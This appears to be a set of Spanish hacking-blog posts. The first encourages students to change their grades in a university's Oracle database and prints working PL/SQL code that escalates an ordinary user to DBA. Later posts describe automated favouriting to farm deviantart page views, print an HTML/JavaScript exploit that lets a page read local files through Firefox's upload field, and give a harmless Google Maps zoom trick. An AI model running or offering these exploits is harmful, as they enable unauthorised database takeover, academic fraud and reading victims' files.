Imaginemos que estamos estudiando en una universidad como la de Alcalá de Henares /uah.es y que somos estudiantes de una carrera (esto está claro sinó no seriamos universitarios) que llevamos más o menos, pero que siempre tenemos alguna asignatura que se nos atasca y no la damos sacado.

Que pasaria si se pudiera cambiar esa nota, eso que tanto hemos visto en películas y que tan bonito nos parece, de la noche a la mañana tener una carrera y ser licenciados (o diplomados que más da :-P )

Pues bien, hoy en dia todo se maneja con ordenadores, si tu cambias la información de una persona en un ordenador, crees que alguien se enteraria? y si ya eres un paranoico y las cambias justo el dia que salen? Crees que alguien se pararia a ver si en verdad esa persona tiene la nota que le puso su profesor. Estamos hablando de 1 alumno entre miles y 1 profesor entre cientos ;-)

Pues bien solo pretendo deciros que sí se puede hacer, que es posible sacarse una carrera y que el unico requisito ahoramismo es que esa nota esté en una base de datos manejada en oracle (justo como ocurre con la uah) y bueno tambien que seamos universitarios o conozcamos el usuario de alguien ( facil de conocer)

El caso, aquí un pequeño fallo que aprovechamos y con nuestro usuario normal nos damos permisos de dba y ala a cambiar notas :-)

select * from user_role_privs;
CREATE OR REPLACE FUNCTION HACKIT return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE ‘grant dba to scott’;
COMMIT;
RETURN ”;
END;
/
set serveroutput on
create table mark_tab (id number primary key, text varchar2(80) );
insert into mark_tab values (’1′, ‘All your bases are belong to US’);
create index mark_tab_idx on mark_tab(text)
indextype is ctxsys.context parameters
(’filter ctxsys.null_filter’);
SET SERVEROUTPUT ON;
DECLARE
mklob CLOB;
amt NUMBER := 40;
line VARCHAR2(80);
BEGIN
CTX_DOC.MARKUP(’mark_tab_idx’,'1′,”||scott.HACKIT()||”, mklob);
DBMS_LOB.READ(mklob, amt, 1, line);
DBMS_OUTPUT.PUT_LINE(’QWRvcmUuVS5NeS5TdGFy’||line);
DBMS_LOB.FREETEMPORARY(mklob);
END;
/
select * from user_role_privs;

Se vió que funciona con oracle 10.1.0.2.0 y fue escrito por Alexandr “Sh2kerr” Polyakov

Para quien no conozca deviantart.com decir que es un lugar en internet donde la gente muestra sus diseños o obras de arte. Esto quiere decir que no es un flickr, no es un myspace, aquí hay diseño (o cosas que se le parecen).

Yo conocí deviantart hace muchos años, cuando empezaba en el mundo de Linux, concretamente cuando empezaba con Debian y queria tener un escritorio bonito, para poder presumir delante de la gente que solo usaba windows 95. Claro cuando buscaba devian o debian pues termine en estas páginas.

Como no era de mi agrado nunca me llegué a registra, o lo hice y no me acuerdo jeje :), la cuestión es que años después estoy registrado subiendo algunas de las fotos que hago y opinando sobre fotos de otras personas.

Pero el tema que quiero tratar hoy es el PageViews, que no es más que un contador que muestra el numero de personas que han visitado tu deviant ( o como se le conoce el DA ). Conozco gente que está toda orgullosa de la cantidad de visitas que tiene y lo bueno que es ( no creo que esten tan orgullosos de la poca vida social que generan )… Pero la cuestión es que aplicando un poco de mi querida ingeniería social (viva el hacking que sirve para algo) y un poquito más de programación podemos hacer que esas visitas o ese PageView aumente como la espuma, lo que se dice hackear deviantart para tener más visitas o pagesviews.

Que como se hace eso… pues bien, partimos de la reacción de los usuarios del DA, como norma general podemo decir que:

• El 80% de los usuarios cuando reciben un favorito se pasan por tu página principal para agradecertelo.
• El 90% tienen favoritos de algún trabajo ajeno.
• El 96% tienen a otros usuarios en su punto de mira (conocido como wachers)

Pues bien ahi tenemos el asunto, y eso fue lo que yo aproveche. Ahora algo aún más sencillo solo tenemos que crear un programa que realice las siguientes funciones:

• Que se conecte con mi cuenta de usuario al DA
• Vaya a sus favoritos y los añada también como favoritos mios (aquí son +2 posibles pageviews)
• Vaya a sus wachers y busque en sus favoritos repitiendo el paso anterior.

Como podeís ver esto es un programa que no para de crecer, llamada tras llamada va multiplicando los favoritos. Después solo tienes que esperar a que esos usuarios vean que has favoriteado una imagen suya y te den las gracias ;)

Con este script he llegado a tener más de 200 pageview o visitas por dia en mi DA.

Descarga el Script Druida_DA_HACK.pl [retirado]

El siguiente exploit explota un fallo para firefox 2.0.4 y superiores dando al atacante el poder leer ficheros en la ruta del fichero que hemos seleccionado a la hora de subir algún fichero.

<html>
<body>
<script>
function restore()
{

document.getElementById(”text1″).value=document.getElementById(”file1″).value;
document.getElementById(”text1″).focus();
}

function doKeyDown()
{
document.getElementById(”label1″).focus();
}
</script>

<input type=”file” id=”file1″ name=”file1″ onkeydown=”restore();”
onkeyup=”restore()” />
<label for=”file1″ id=”label1″ name=”label1″></label>
<br>
<textarea name=”text1″ id=”text1″ onkeydown=”doKeyDown()”>
</textarea>
</body>
</html>

Como podeis ver el problema reside en la función focus() y este fallo ha sido encontrado por carl hardwick.

Hasta que punto que alguíen pueda almacenar imagenes tan detalladas de algo asi es bueno? Todos conocemos Google maps, sobretodo ahora que algunos vamos empezar con el geochaching… pero resulta que se puede hackear… bueno es un pequeño hack que logra cosas como estas.

Pues si, es google maps, se acerca tanto a la imagen que se puede ver incluso como están mirando para la avioneta… a mi me parece increible.

Que como hacer esto, pues algunos puntos y ciudades están muy detallados pero el zoom máximo solo llega a un punto, parece ser política de google, pero se puede modificar haciendo lo siguiente:

Vamos a google maps y a algún sitio que nos interese (y que pueda tener este nivel de detalle) como por ejemplo las vegas y el famoso casino-hotel piramide

Ahora le daremos al zoom hasta que no vaya más.

Por ultimo le damos a “link to this page” para que en la barra aparezca la dirección completa, es ahora donde viene el hack

Buscamos donde ponga z= y un numero,pues bien! ese numero se puede cambiar por valores como 20,21,22,23. A mayor numero mayor zoom.

Hack por blog de Philipp Lenssen [via Error500]